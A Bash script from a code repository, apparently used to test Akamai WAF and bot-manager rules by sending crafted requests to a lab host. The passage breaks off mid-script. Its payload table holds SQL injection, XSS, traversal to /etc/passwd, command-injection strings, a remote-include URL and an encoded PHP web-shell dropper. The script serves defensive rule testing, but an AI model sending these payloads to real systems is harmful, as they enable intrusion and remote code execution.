akamai
/
origin33
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
origin33/app/flask/scripts/mychecker.sh

555 lines
31 KiB
Bash
Raw Blame History

#! /bin/bash
function logo()
{
echo " _ _ "
echo " | | | | "
echo " ___| |__ ___ ___| | _____ _ __ "
echo " / __| '_ \ / _ \/ __| |/ / _ \ '__|"
echo "| (__| | | | __/ (__| < __/ | "
echo " \___|_| |_|\___|\___|_|\_\___|_| v1.0"
echo ""
}
function help()
{
logo
echo "Welcome! This script aims to ease the testing of WAF Application Controls, Bot Manager Standard and Bot Manager Premier"
echo "Please check the information below in order to configure the proper parameters."
echo
echo "checker.sh -c [<file>] -r [<reference>] -v -e -d -m"
echo ""
echo "-c Configuration file. Check default.conf inside 'conf' folder for more information or use the -m option"
echo ""
echo "Optional:"
echo "-r Identifier added to the referer header to filter in WSA."
echo "-v Verbose mode."
echo "-e Export results to a CSV file."
echo "-d Use DNS lookup instead of hard-coded Edge IPs (use with caution, resolvers could block your IP if too much tests)."
echo "-m Print manual."
echo ""
}
function helpconf()
{
logo
echo "This script reads a configuration file that uses the following 6 block of data per line:"
echo ""
echo "[type] [environment] [method] [URL] [path] [arguments(optional)]"
echo ""
echo "Examples:"
echo "atg p GET http://www.{akamaized domain}.com / krs-cmd"
echo "bms s GET http://www.{akamaized domain}.com / aka-arb"
echo "bmp p POST http://www.{akamaized domain}.com / foo=bar"
echo "man s GET http://www.{akamaized domain}.com /?foo=bar"
echo "man p POST http://www.{akamaized domain}.com / foo=bar"
echo ""
echo "Available options:"
echo "--------------------------------------------------------------------------------------"
echo "type The type of control that will be tested, options are:"
echo " atg -- WAF Attack Groups"
echo " bms -- Bot Manager Standard"
echo " bmp -- Bot Manager Premier"
echo " man -- Manual test"
echo "environment Destination of the request to be generated, options are:"
echo " s -- Staging environment"
echo " p -- Production environment"
echo "method Method expected on Akamai for the tested URL, options are: GET or POST"
echo "url URL to test, the protocol (http or https) needs to be used"
echo "path Path to test (use / if no specific path)"
echo "arguments For atg:"
echo " krs-cmd -- Command Injection"
echo " krs-xss -- Cross-Site Scripting"
echo " krs-dos -- DDOS"
echo " krs-iht -- Invalid HTTP"
echo " krs-php -- PHP Injection"
echo " krs-rfi -- Remote File Inclusion"
echo " krs-sql -- SQL Injection"
echo " krs-trj -- Trojan"
echo " aag-wat -- Web Attack Tool"
echo " aag-wpr -- Web Protocol Attack"
echo " aag-sql -- SQL Injection"
echo " aag-xss -- Cross-Site Scripting"
echo " aag-lfi -- Local File Inclusion"
echo " aag-rfi -- Remote File Inclusion"
echo " aag-cmi -- Command Injection"
echo " aag-wpl -- Web Platform Attack"
echo " penalty -- Penalty test (no attack)"
echo " For bms:"
echo " aka-arb -- Academic or Research Bots"
echo " aka-asc -- Automated Shopping Cart and Sniper Bots"
echo " aka-bib -- Business Intelligence Bots"
echo " aka-eco -- E-Commerce Search Engine Bots"
echo " aka-eag -- Enterprise Data Aggregator Bots"
echo " aka-fia -- Financial Account Aggregator Bots"
echo " aka-fis -- Financial Services Bots"
echo " aka-job -- Job Search Engine Bots"
echo " aka-mda -- Media or Entertainment Search Bots"
echo " aka-new -- News Aggregator Bots"
echo " aka-onl -- Online Advertising Bots"
echo " aka-rss -- RSS Feed Reader Bots"
echo " aka-seo -- SEO, Analytics or Marketing Bots"
echo " aka-sit -- Site Monitoring and Web Development Bots"
echo " aka-soc -- Social Media or Blog Bots"
echo " aka-war -- Web Archiver Bots"
echo " aka-wse -- Web Search Engine Bots"
echo " tra-ikb -- Impersonators of Known Bots"
echo " tra-dvf -- Development Frameworks"
echo " tra-htl -- HTTP Libraries"
echo " tra-wsl -- Web Services Libraries"
echo " tra-osc -- Open Source Crawlers/Scraping Platforms"
echo " tra-hbt -- Headless Browsers/Automation Tools"
echo " tra-dcb -- Declared Bots (Keyword Match)"
echo " tra-agc -- Aggressive Web Crawlers"
echo " tra-req -- Request Anomaly"
echo " act-cok -- Cookie Integrity Failed"
echo " For bmp:"
echo " List of body parameters used by the endpoint (if any)"
echo " For man:"
echo " If using POST, list of body parameters"
}
function readconfig
{
if [ $verbose -eq 1 ]; then echo -e "> reading configuration"; fi
while IFS=' ' read -ra line || [ -n "$line" ];
do
[[ "$line" =~ ^(#.*|^$)$ ]] && continue
for i in "${line[@]}"; do
test_string+=("$i")
done
if [ $verbose -eq 1 ]; then echo -e "> ${test_string[0]} ${test_string[1]} ${test_string[2]} ${test_string[3]} ${test_string[4]} ${test_string[5]}"; fi
test_string[3]='http://'$property'.akamai-lab.com'
# echo $test_string[3]
protocol=""
sleepsec=5
if [[ ${test_string[3]} =~ ^http:// ]];
then
host=${test_string[3]:7};
protocol=${test_string[3]:0:4};
fi
if [[ ${test_string[3]} =~ ^https:// ]];
then
host=${test_string[3]:8};
protocol=${test_string[3]:0:5};
fi
if [[ $host == '' ]]; then
echo "Oops... did't find any valid protocol."
exit
fi
env=""
if [[ ${test_string[1]} == 'p' ]]; then
env="Production"
if [[ $protocol == 'http' ]]; then resolve 1; fi
if [[ $protocol == 'https' ]]; then resolve 2; fi
elif [[ ${test_string[1]} == 's' ]]; then
env="Staging"
if [[ $protocol == 'http' ]]; then resolve 3; fi
if [[ $protocol == 'https' ]]; then resolve 4; fi
else
echo "Oops... not a valid environment."
exit
fi
test_string=()
if [ $verbose -eq 1 ]; then echo -e "> sleeping for 5 seconds..."; fi
sleep $sleepsec
done < "$filecnf"
}
function resolve()
{
xpass=0
if [[ $1 == 1 ]]; then
if [[ $PFIP == '' ]]; then
dig="dig +short $PFFQ | tail -n1"
PFIPi=$(eval $dig)
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PFIPi]"; fi
else
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
if [[ $xpass == 1 ]]; then
iparray=(${PFIP//:/ })
PFIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
fi
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PFIPi]"; fi
fi
curl $PFIPi
elif [[ $1 == 2 ]]; then
if [[ $PEIP == '' ]]; then
dig="dig +short $PEFQ | tail -n1"
PEIPi=$(eval $dig)
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$PEIPi]"; fi
else
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $PEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
if [[ $xpass == 1 ]]; then
iparray=(${PEIP//:/ })
PEIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
fi
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$PEIPi]"; fi
fi
curl $PEIPi
elif [[ $1 == 3 ]]; then
if [[ $SFIP == '' ]]; then
dig="dig +short $SFFQ | tail -n1"
SFIPi=$(eval $dig)
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SFIPi]"; fi
else
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SFIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
if [[ $xpass == 1 ]]; then
iparray=(${SFIP//:/ })
SFIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
fi
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SFIPi]"; fi
fi
curl $SFIPi
elif [[ $1 == 4 ]]; then
if [[ $SEIP == '' ]]; then
dig="dig +short $SEFQ | tail -n1"
SEIPi=$(eval $dig)
if [ $verbose -eq 1 ]; then echo -e "> DNS lookup performed [$SEIPi]"; fi
else
if ! [[ ${test_string[5]} =~ ^aag- || ${test_string[5]} = 'penalty' ]]; then xpass=1; else if [[ $SEIPi == '' ]]; then xpass=1; else xpass=0; fi; sleepsec=0; fi
if [[ $xpass == 1 ]]; then
iparray=(${SEIP//:/ })
SEIPi="${iparray[$RANDOM % ${#iparray[@]}]}"
fi
if [ $verbose -eq 1 ]; then echo -e "> Cache used [$SEIPi]"; fi
fi
curl $SEIPi
fi
}
function exportcsv()
{
if [ $verbose -eq 1 ]; then echo -e "> exporting .csv"; fi
export_payload=""
export_type=""
for i in ${!ACRONYMA[@]}; do
if [[ ${test_string[5]} == ${ACRONYMA[$i]} ]]; then export_payload=${ACRONYMB[$i]}; fi
if [[ ${test_string[0]} == ${ACRONYMA[$i]} ]]; then export_type=${ACRONYMB[$i]}; fi
done
if [[ ${test_string[0]} == 'bmp' ]]; then export_payload=${test_string[5]}; fi
echo "${env},${http},${epoch},${refe},$export_type,$export_payload,${URL}" >> "$(basename ${filecnf})_${filetim}.csv"
}
function payload
{
PARAMHOLDER="?id=1"
HEADERHOLDER1=""
HEADERHOLDER2=""
HEADERHOLDER3=""
rules=(${1//:/ })
for i in ${!rules[@]}; do
case ${rules[$i]} in
"950002") PARAMHOLDER+="&p=powershell.exe"; ;;
"950006") PARAMHOLDER+="&p=chmod.40%2B1x.traceroute"; ;;
"950011") PARAMHOLDER+="&p=%3C%21--%23printenv"; ;;
"950103") HEADERHOLDER1+="p: ..%2F..%2F..%2F..%2F"; ;;
"950907") PARAMHOLDER+="&p=wget"; ;;
"3000005") PARAMHOLDER+="&p=%2Fsbin%2Fping"; ;;
"3000007") PARAMHOLDER+="&p=%3B+head+%2Fusr%2Ftemp+%3E+my.f"; ;;
"3000012") PARAMHOLDER+="&p=action%3Anew+java."; ;;
"3000013") PARAMHOLDER+="&p=wget+https%3A%2F%2Fmy.site"; ;;
"3000014") PARAMHOLDER+="&p=%24%7B.openstream()."; ;;
"3000020") PARAMHOLDER+="&p=%2Fproc%2Fself%2Fenviron"; ;;
"3000023") PARAMHOLDER+="&class%5B%27classLoader%27%5D%5B%27resources%27%5D%5B%27dirContext%27%5D%5B%27docBase%27%5D%3D%2F%2F192.168.18.1%2Ffile.do"; ;;
"3000025") PARAMHOLDER+="&p=()%20%7B.4654"; ;;
"3000031") HEADERHOLDER2+="Range: 18446744073709551615"; ;;
"3000033") PARAMHOLDER+="&p=phar%3A%2F%2F%20zlib%3A%2F%2F%20glob%3A%2F%2F%20expect%3A%2F%2F%20jar%3A%2F%2F"; ;;
"3000034") PARAMHOLDER+="&p=Runtime.getRuntime("; ;;
"3000041") PARAMHOLDER+="&p=%24class.inspect(%20type.getruntime(freemarker.template.utility.execute"; ;;
"3000056") PARAMHOLDER+="&p=o%3A5%3A%5C%22456%5C%22%3A546%3A%7Ba%3B%7D"; ;;
"3000058") PARAMHOLDER+="&p=action%3A%24%7B"; ;;
"3000065") H10="Content-Type: text/xml"; DATAHOLDER='<command>%3Ccommand%3Ejava.lang.processbuilder$nullinputstream\ncom.sun.xml.internal.ws.encoding.xml.xmlmessage$xmldatasource\njavax.crypto.cipherinputstream\njavax.crypto.nullcipher\n<classfactory>\njava.lang.processbuilder%24nullinputstream%5Cn%0Dcom.sun.xml.internal.ws.encoding.xml.xmlmessage%24xmldatasource%5Cn%0Djavax.crypto.cipherinputstream%5Cn%0Djavax.crypto.nullcipher%5Cn%0D%3Cclassfactory%3E'; ;;
"3000068") PARAMHOLDER+="&p=%3Cesi%3Ainclude"; ;;
"3000072") H10="Content-Type: application/octet-stream"; DATAHOLDER='*.exec(* *burpcollaborator* *ysoserial* *freddy?*http:*.20java.%2Fio%2Ffile%20java%2Flang%2Fruntime.123'; ;;
"950018") PARAMHOLDER+="&p=http%3A%2F%2Fwww.test.com%2Ftest.pdf%20x0d%23"; ;;
"958000") PARAMHOLDER+="&p=.addimport"; ;;
"958001") PARAMHOLDER+="&p=document.exitFullscreen%5D"; ;;
"958002") PARAMHOLDER+="&p=.execscript"; ;;
"958003") PARAMHOLDER+="&p=.fromcharcode"; ;;
"958004") PARAMHOLDER+="&p=.innerhtml"; ;;
"958005") PARAMHOLDER+="&p=%3C!%5Bcdata%5B"; ;;
"958006") PARAMHOLDER+="&p=%3Cbody%20background"; ;;
"958007") PARAMHOLDER+="&p=%3Cbody%20onload"; ;;
"958008") PARAMHOLDER+="&p=%3Cinput%20type%20image"; ;;
"958009") PARAMHOLDER+="&p=%40import"; ;;
"958010") PARAMHOLDER+="&p=activexobject"; ;;
"958011") PARAMHOLDER+="&p=background-image%3A"; ;;
"958012") PARAMHOLDER+="&p=copyparentfolder"; ;;
"958013") PARAMHOLDER+="&p=createtextrange"; ;;
"958016") PARAMHOLDER+="&p=getparentfolder"; ;;
"958017") PARAMHOLDER+="&p=getspecialfolder"; ;;
"958018") PARAMHOLDER+="&p=href%20javascript%3A"; ;;
"958019") PARAMHOLDER+="&p=href%20shell%3A"; ;;
"958020") PARAMHOLDER+="&p=href%20vbscript%3A"; ;;
"958022") PARAMHOLDER+="&p=livescript%3A"; ;;
"958023") PARAMHOLDER+="&p=lowsrc%20javascript%3A"; ;;
"958024") PARAMHOLDER+="&p=lowsrc%20shell%3A"; ;;
"958025") PARAMHOLDER+="&p=lowsrc%20vbscript%3A"; ;;
"958026") PARAMHOLDER+="&p=mocha%3A"; ;;
"958027") PARAMHOLDER+="&p=onabort"; ;;
"958028") PARAMHOLDER+="&p=settimeout%20("; ;;
"958030") PARAMHOLDER+="&p=src%20http%3A"; ;;
"958031") PARAMHOLDER+="&p=src%20javascript%3A"; ;;
"958032") PARAMHOLDER+="&p=src%20shell%3A"; ;;
"958033") PARAMHOLDER+="&p=src%20vbscript%3A"; ;;
"958034") PARAMHOLDER+="&p=style%3Dbexpression("; ;;
"958036") PARAMHOLDER+="&p=type%20application%20x-javascript"; ;;
"958037") PARAMHOLDER+="&p=type%20application%20x-vbscript"; ;;
"958038") PARAMHOLDER+="&p=type%20text%20ecmascript"; ;;
"958039") PARAMHOLDER+="&p=type%20text%20javascript"; ;;
"958040") PARAMHOLDER+="&p=type%20text%20jscript"; ;;
"958041") PARAMHOLDER+="&p=type%20text%20vbscript"; ;;
"958045") PARAMHOLDER+="&p=url%20javascript%3A"; ;;
"958046") PARAMHOLDER+="&p=url%20shell%3A"; ;;
"958047") PARAMHOLDER+="&p=url%20vbscript%3A"; ;;
"3000036") PARAMHOLDER+="&foo&msg=bar"; ;;
"950116") PARAMHOLDER="%ufF12/"; ;;
"950107") PARAMHOLDER="%00%!%u1234/?id=1"; ;;
"950108") H10="Content-Type: application/x-www-form-urlencoded;charset=test"; DATAHOLDER='%00%!%u1234/'; ;;
"950109") PARAMHOLDER+="&p=%2500%25!%25u1234"; ;;
"958230") HEADERHOLDER1="Range: 50-10 bytes=10-,10-,10-,10-,10-,"; ;;
"958231") HEADERHOLDER1="Range: bytes=10-,10-,10-,10-,10-,"; ;;
"958291") HEADERHOLDER1="Range: bytes=0-"; ;;
"958295") HEADERHOLDER1="Connection: keep-alive,close"; ;;
"960006") H9="User-Agent;"; ;;
"960007") H6="Host;"; ;;
"960008") H6="Host:"; ;;
"960009") H9="User-Agent:"; ;;
"960010") HEADERHOLDER1="Content-Type: application/x-www-checker"; ;;
"960011") HEADERHOLDER2="Content-Length: 1000"; ;;
"960012") HEADERHOLDER2="Content-Length:"; ;;
"960016") HEADERHOLDER2="Content-Length: checker"; ;;
"960022") HEADERHOLDER1="Expect: 100-continue"; PROTOCOLHOLDER="--http1.0"; ;;
"960034") PROTOCOLHOLDER="--httpX.X"; ;;
"960038") HEADERHOLDER1="Content-Range: test"; ;;
"960901") PARAMHOLDER+="&one=more"; ;;
"960902") HEADERHOLDER3="Content-Encoding: Identity"; ;;
"958976") PARAMHOLDER+="&current={pboot:if(eval\($_GET\['a'\]))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd4YiddKTsgPz54YnNoZWxs'));"; ;;
"958977") PARAMHOLDER+="&p=allow_url_include%3D%20safe_mode%3D%20suhosin.simulation%3D%20disable_functions%3D%20open_basedir%3D%20auto_prepend_file%3D%20php%3A%2F%2Finput"; ;;
"959151") PARAMHOLDER+="&p=%3C%3F%3C%3F"; ;;
"3000003") PARAMHOLDER+="&p=base64_decode("; ;;
"3000016") PARAMHOLDER+="&p=data%3Atext%2Fplain%3Bbase64%2C"; ;;
"950117") PARAMHOLDER+="&p=https%3A%2F%2F123.123.123.123"; ;;
"950118") PARAMHOLDER+="&p=mosConfig_absolute_path=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;;
"950119") PARAMHOLDER+="&p=https%3A%2F%2F${test_string[3]}%3F"; ;;
"950120") PARAMHOLDER+="&referer=GALLERY_BASEDIR%3Dhttps%3A%2F%2F%5B%5E%5Cs%5D%2B"; ;;
"950001") PARAMHOLDER+="&p=dbms_java"; ;;
"950007") PARAMHOLDER+="&p=attnotnull"; ;;
"950901") PARAMHOLDER+="&p=%22test%3C%3D%3E%22test"; ;;
"950908") PARAMHOLDER+="&p=coalesce"; ;;
"959070") PARAMHOLDER+="&p=create%20table%27%20statements%20(e.g.%20%27create%20table%20("; ;;
"959071") PARAMHOLDER+="&p=%27%20OR%20%27string%27%20%3C"; ;;
"959072") PARAMHOLDER+="&p=AND%20%27string%27%3D"; ;;
"959073") PARAMHOLDER+="&p=select%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27by%27...%27having"; ;;
"981172") COOKIEHOLDER="p=%27...%27length%27...%27from%27%2C%20%27select%27...%27count%27...%27from%27%2C%20%27sp_sqlexec%27%2C%20%27group%27...%27"; ;;
"950110") HEADERHOLDER1="x_file: test"; ;;
"950921") PARAMHOLDER="/scri%E2%80%8Cpts/root.exe&/c+dir"; ;;
"watatomic") PARAMHOLDER="/bbscan-404-existence-check?id=1&msg=legion"; UAHOLDER+=" absinthe"; HEADERHOLDER1="acunetix-aspect: 1"; HEADERHOLDER2="nstealth_xss: nstealth_xss"; ;;
"wpratomic") HEADERHOLDER1="Content-Type: application/xml"; HEADERHOLDER2=" Transfer-Encoding: checker"; HEADERHOLDER3="Content-Length: chunked"; ;;
"sqlatomic") PARAMHOLDER+="&fakeparam=-1%20UNION%20ALL%20SELECT%20%40%40version%2C2%2C3--"; ;;
"xssatomic") PARAMHOLDER+="&fakeparam=%3Cscript%3Ewindow.alert(%221213%22)%3C%2Fscript%3E&f2=PHNjcmlwdD5hbGVyd"; ;;
"lfiatomic") PARAMHOLDER+="&fakeparam=.././.././../etc/passwd"; ;;
"rfiatomic") PARAMHOLDER+="&fakeparam=http://cirt.net/rfiinc.txt"; ;;
"cmiatomic") PARAMHOLDER+="&fakeparam=something;/bin/whoami"; ;;
"wplatomic") HEADERHOLDER1+="Range: 18446744073709551615"; ;;
*) PARAMHOLDER="" ; ;;
esac
done
}
function curl
{
shopt -s nocasematch
if [[ ${test_string[2]} =~ ^(GET|POST)?$ ]]; then
if [ $verbose -eq 1 ]; then echo -e "> using ${test_string[2]}"; fi
if ! [[ ${test_string[2]} =~ ^(GET)?$ ]]; then method="-X ${test_string[2]}"; else method=""; fi
COOKIEHOLDER=""
HEADERHOLDER1="Connection: keep-alive"
HEADERHOLDER2=""
PARAMHOLDER=""
PATHHOLDER=""
DATAHOLDER="{'foo':'bar'}"
UAHOLDER=""
PROTOCOLHOLDER="--http2"
if [ -z "$fileref" ]; then
epoch=$(date +%s);
else
epoch=$fileref;
fi
H1="Accept: application/json"
H2="Accept-Encoding: gzip;q=1.0, compress;q=0.5"
H3="Accept-Language: en-US,en;q=1.0"
H4="Cache-Control: no-cache"
H5="Cookie: foo=bar;"
H6="Host: $host"
H7="Origin: ${test_string[3]}"
H8="Referer: $epoch"
H9="User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36 opr/checker"
H10="Content-Type: text/plain"
if [ ${test_string[0]} = 'atg' ]; then
if [ $verbose -eq 1 ]; then echo -e "> Attack Group (atg) found"; fi
case ${test_string[5]} in
"krs-cmd") payload "950002:950006:950011:950103:950907:3000005";;
"krs-xss") payload "950018:958000:958001:958002:958003:958004:958005:958006:958007:958008:958009:958010:958011:958012:958013:958016:958017:958018:958019:958020:958022:958023:958024:958025:958026:958027:958028:958030:958031:958032:958033:958034:958036:958037:958038:958039:958040:958041:958045:958046:958047"; ;;
"krs-dos") payload "3000036"; ;;
"krs-iht") payload "950107:950108:950109:958291:958295:960010:960016:960022:960038:960901:960902"; ;;
"krs-php") payload "958976:958977:959151:3000003:3000016"; ;;
"krs-rfi") payload "950117:950118:950119:950120"; ;;
"krs-sql") payload "950001:950007:950901:950908:959070:959071:959072:959073:981172"; ;;
"krs-trj") payload "950110:950921"; ;;
"aag-wat") payload "watatomic"; ;;
"aag-wpr") payload "wpratomic"; ;;
"aag-sql") payload "sqlatomic"; ;;
"aag-xss") payload "xssatomic"; ;;
"aag-lfi") payload "lfiatomic"; ;;
"aag-rfi") payload "rfiatomic"; ;;
"aag-cmi") payload "cmiatomic"; ;;
"aag-wpl") payload "wplatomic"; ;;
"penalty") payload ""; ;;
*) echo -e 'Oops... invalid argument!'; exit; ;;
esac
elif [ ${test_string[0]} = 'bms' ]; then
if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Standard (bms) found"; fi
case ${test_string[5]} in
"aka-arb") UAHOLDER+=" lightspeedsystems"; ;;
"aka-asc") HEADERHOLDER1+="X-HONEY-BOT:Hi_HC_Aegah4luquud8ahVOchood5a"; ;;
"aka-bib") UAHOLDER+=" companybooknetworking.com"; ;;
"aka-eco") HEADERHOLDER1="X-HONEY-BOT:Hi_PC_uNeini4aphaiB1oiChoh1thi"; ;;
"aka-eag") UAHOLDER+=" shrinktheweb.com"; ;;
"aka-fia") UAHOLDER+=" (moneyforward)"; HEADERHOLDER1="X-MF-Tag:12345678"; ;;
"aka-fis") UAHOLDER+=" drwholdings.com"; ;;
"aka-job") UAHOLDER+=" motorelavoro.it"; ;;
"aka-mda") UAHOLDER+=" localconditions.com"; ;;
"aka-new") UAHOLDER+=" reader.aol.com"; ;;
"aka-onl") UAHOLDER+=" integralads.com"; ;;
"aka-rss") UAHOLDER+=" pocketcasts.com"; ;;
"aka-seo") UAHOLDER+=" terrykyleseoagency.com"; ;;
"aka-sit") HEADERHOLDER1="X-Abuse-Info: New Relic Synthetics Monitor"; ;;
"aka-soc") UAHOLDER+=" socialrank.io"; ;;
"aka-war") UAHOLDER+=" europarchive.org"; ;;
"aka-wse") UAHOLDER+=" femtosearch.com"; ;;
"tra-ikb") UAHOLDER+=" amazon route 53"; ;;
"tra-dvf") UAHOLDER+=" ruby microsoft atl native"; ;;
"tra-htl") UAHOLDER+=" winhttprequest"; ;;
"tra-wsl") UAHOLDER+=" httpful"; ;;
"tra-osc") UAHOLDER+=" mercury.postlight.com"; ;;
"tra-hbt") UAHOLDER+=" prerender"; ;;
"tra-dcb") UAHOLDER+=" semantic"; ;;
"tra-agc") UAHOLDER+=" openhose.org"; ;;
"tra-req") HEADERHOLDER1="Accept-Language: en"; UAHOLDER+=" mozilla./"; ;;
"act-cok") COOKIEHOLDER="ak_bmsc=foobar; bm_mi=foobar"; ;;
*) echo -e 'Oops... invalid argument!'; exit; ;;
esac
elif [ ${test_string[0]} = 'bmp' ]; then
if [ $verbose -eq 1 ]; then echo -e "> Bot Manager Premier (bmp) found"; fi
if [[ ${test_string[5]} != '' ]]; then
DATAHOLDER="${test_string[5]}"
fi
test_string[5]="BMP";
elif [ ${test_string[0]} = 'man' ]; then
if [ $verbose -eq 1 ]; then echo -e "> Manual test found"; fi
if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then DATAHOLDER=${test_string[5]}; fi
test_string[5]="Manual";
else
if [ $verbose -eq 1 ]; then echo -e "> No type found"; fi
fi
description="";
if [ ${test_string[5]} = 'aka-arb' ]; then
description="Academic or Research Bots"
elif [ ${test_string[5]} = 'aka-seo' ]; then
description="SEO, Analytics or Marketing Bots"
elif [ ${test_string[5]} = 'aka-eco' ]; then
description='E-Commerce Search Engine Bots'
elif [ ${test_string[5]} = 'tra-ikb' ]; then
description='Impersonators of Known Bots'
elif [ ${test_string[5]} = 'tra-hbt' ]; then
description='Headless Browsers/Automation Tools'
elif [ ${test_string[5]} = 'act-cok' ]; then
description='Cookie Integrity Failed'
else
description='not equal';
fi
export now=$(date)
echo -e "\t $now : [ $env ] [ $description ]"
H9+=${UAHOLDER}
H5+=${COOKIEHOLDER}
URL="${test_string[3]}${test_string[4]}${PARAMHOLDER}"
CURL='/usr/bin/curl'
CURLARGS="-i -k -s -S -v -m 30 $method $PROTOCOLHOLDER --connect-to ::$1"
echo -e "${test_string[3]}${test_string[4]}"
if [[ ${test_string[2]} =~ ^(POST)?$ ]]; then
if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$H10\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\" --data-raw \"$DATAHOLDER\""; fi
$CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$H10" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" --data-raw "$DATAHOLDER" &> .temp
else
if [ $verbose -eq 1 ]; then echo -e "> using $CURL $CURLARGS \"$URL\" -H \"$H1\" -H \"$H2\" -H \"$H3\" -H \"$H4\" -H \"$H5\" -H \"$H6\" -H \"$H7\" -H \"$H8\" -H \"$H9\" -H \"Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values\" -H \"$HEADERHOLDER1\" -H \"$HEADERHOLDER2\" -H \"$HEADERHOLDER3\""; fi
$CURL $CURLARGS "$URL" -H "$H1" -H "$H2" -H "$H3" -H "$H4" -H "$H5" -H "$H6" -H "$H7" -H "$H8" -H "$H9" -H "Pragma: akamai-x-cache-on, akamai-x-cache-remote-on, akamai-x-check-cacheable, akamai-x-get-cache-key, akamai-x-get-extracted-values, akamai-x-get-nonces, akamai-x-get-ssl-client-session-id, akamai-x-get-true-cache-key, akamai-x-serial-no, akamai-x-get-request-id, akamai-x-request-trace, akamai-x--meta-trace, akama-xi-get-extracted-values" -H "$HEADERHOLDER1" -H "$HEADERHOLDER2" -H "$HEADERHOLDER3" &> .temp
fi
echo "checker" >> .temp
regexhtc='^HTTP\/[0-9]\.[0-9][ ]([[:digit:]]{3})|^curl:.*error: (.*)|^HTTP/2[ ]([[:digit:]]{3})'
regexref='(#|[[:space:]])([[:digit:]]+\.[a-zA-Z0-9]+\.[a-zA-Z0-9]{10,}\.[a-zA-Z0-9]+)'
regexdie='.*doctype.*|^(^$)$'
stopv=0
http="Timeout"
refe="Unable to get AK_REFERENCE_ID"
while IFS= read -r liner; do
liner="${liner//&#46;/.}"
liner="${liner//&#35;/#}"
if [[ $liner =~ $regexhtc ]]; then http="${BASH_REMATCH[1]}${BASH_REMATCH[2]}${BASH_REMATCH[3]}"; http=${http%$'\r'}; http=${http%$' '}; fi
if [[ $liner =~ $regexref ]]; then refe="${BASH_REMATCH[2]}"; fi
if [ $verbose -eq 1 ]; then if ! [[ $liner =~ $regexdie || $stopv -eq 1 ]]; then echo "$liner"; else stopv=1; fi; fi
done < .temp
echo -e "${http}"
# echo -e "${epoch}"
# echo -e "${refe}"
echo -e ""
if [[ ${filetim} != '' ]]; then exportcsv; fi
else
echo -e 'Oops... wrong method!'
exit
fi
}
property=$3
verbose=0
filetim=""; filecnf=""; fileref=""
PFIPi=""; PEIPi=""; SFIPi=""; SEIPi=""
PFIP="23.54.162.184:23.63.22.131:23.63.22.169:186.177.65.217:186.177.65.208"
PEIP="72.246.84.4:23.40.180.4:23.48.16.4"
SFIP="23.50.49.10:23.50.55.19:23.50.55.25:23.50.51.50:23.50.51.51"
SEIP="23.199.36.2:23.34.4.4:23.59.184.2"
PFFQ="a1.g.akamai.net"
PEFQ="e1.a.akamaiedge.net"
SFFQ="a1.g.akamai-staging.net"
SEFQ="e1.a.akamaiedge-staging.net"
rules=()
headerorder=()
while getopts "c:r:vedm" option; do
case $option in
c)
filecnf=${OPTARG};;
v)
verbose=1 ;;
r)
fileref=${OPTARG};;
e)
filetim=$(date +%s) ;;
d)
PFIP=""
PEIP=""
SFIP=""
SEIP="";;
m)
helpconf
exit;;
esac
done
if (( $OPTIND == 1 )); then
help
exit
fi
if [[ ${filetim} != '' ]]; then
export_type=""
export_payload=""
